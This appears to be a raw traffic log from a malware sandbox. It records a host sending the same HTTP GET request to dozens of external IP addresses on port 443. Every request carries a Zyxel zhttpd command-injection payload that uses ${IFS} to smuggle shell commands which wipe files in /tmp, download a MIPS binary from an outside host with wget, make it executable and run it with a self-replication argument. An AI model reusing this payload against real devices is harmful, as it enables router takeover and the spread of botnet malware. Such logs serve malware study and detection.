                                              Jan 29, 2024 07:04:08.366892099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8847192.168.2.1445926189.251.114.128443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366944075 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8848192.168.2.1439898175.254.243.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.366976023 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8849192.168.2.1451004187.206.154.84443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367011070 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8850192.168.2.1447104155.90.42.142443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367043018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8851192.168.2.14531869.112.207.98443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367070913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8852192.168.2.1456788206.243.71.76443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367103100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8853192.168.2.1433186199.68.56.124443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367152929 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8854192.168.2.1457966158.90.241.241443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367182016 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8855192.168.2.1438208211.45.53.221443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367221117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8856192.168.2.145904488.39.119.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367255926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8857192.168.2.145199261.164.209.36443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367284060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8858192.168.2.146047879.245.46.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367315054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8859192.168.2.1460648194.87.57.107443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367363930 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8860192.168.2.1454366196.54.102.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367394924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8861192.168.2.1454430123.169.105.64443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367436886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8862192.168.2.145599290.250.97.163443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367455959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8863192.168.2.1438534147.166.5.53443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367500067 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8864192.168.2.1457688178.76.232.118443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367548943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8865192.168.2.1454106123.157.160.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367588997 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8866192.168.2.145913850.77.230.126443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367635965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8867192.168.2.1447148158.106.62.100443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367675066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8868192.168.2.143784618.24.230.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367698908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8869192.168.2.1454578221.132.112.216443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367750883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8870192.168.2.14404944.54.11.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367780924 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8871192.168.2.143307448.20.76.189443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367840052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8872192.168.2.1455722106.7.241.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367862940 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8873192.168.2.145287680.151.215.235443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367897034 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8874192.168.2.1460086178.38.211.102443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367939949 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8875192.168.2.144787464.76.159.10443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.367970943 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8876192.168.2.145468661.16.165.177443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368025064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8877192.168.2.1453948144.222.217.175443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368056059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8878192.168.2.1453282102.35.163.104443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368113995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8879192.168.2.1440336218.74.216.240443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368155003 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8880192.168.2.1452756128.53.228.92443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368165970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8881192.168.2.1438718218.142.211.7443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368218899 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8882192.168.2.1439280183.223.84.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368247986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8883192.168.2.1454486164.173.195.231443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368297100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8884192.168.2.144760070.157.204.8443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368340015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8885192.168.2.1440680116.115.148.244443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368364096 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8886192.168.2.144437272.189.7.27443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368402004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8887192.168.2.143306637.127.46.229443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368448019 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8888192.168.2.145140495.234.247.40443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368486881 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8889192.168.2.143865087.100.36.2443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368490934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8890192.168.2.1441214179.33.227.181443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368542910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8891192.168.2.144458677.101.153.60443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368571043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8892192.168.2.1447806126.199.59.17443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368632078 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8893192.168.2.1444442113.127.75.41443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368642092 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8894192.168.2.143616020.126.248.103443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368697882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8895192.168.2.145099866.229.123.57443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368740082 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8896192.168.2.145733624.218.68.168443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368777990 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8897192.168.2.145969245.56.254.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368824005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8898192.168.2.1441132109.250.108.140443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368859053 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8899192.168.2.1444592105.247.176.183443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368915081 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8900192.168.2.1447076124.211.201.59443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.368969917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8901192.168.2.1438316176.177.5.214443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369004965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8902192.168.2.143295850.163.116.112443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369035006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8903192.168.2.1441922151.133.183.204443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369062901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8904192.168.2.144588662.104.233.121443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369119883 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8905192.168.2.1458170161.101.172.194443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369143009 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8906192.168.2.145983027.36.111.173443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369179010 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8907192.168.2.144025874.123.94.11443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369199991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8908192.168.2.1450684120.86.59.29443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369261026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8909192.168.2.145149214.30.61.232443
                                              TimestampBytes transferredDirectionData
                                              Jan 29, 2024 07:04:08.369278908 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              8910192.168.2.1436866112.74.144.235443
                                              TimestampBytes transferredDirectionData
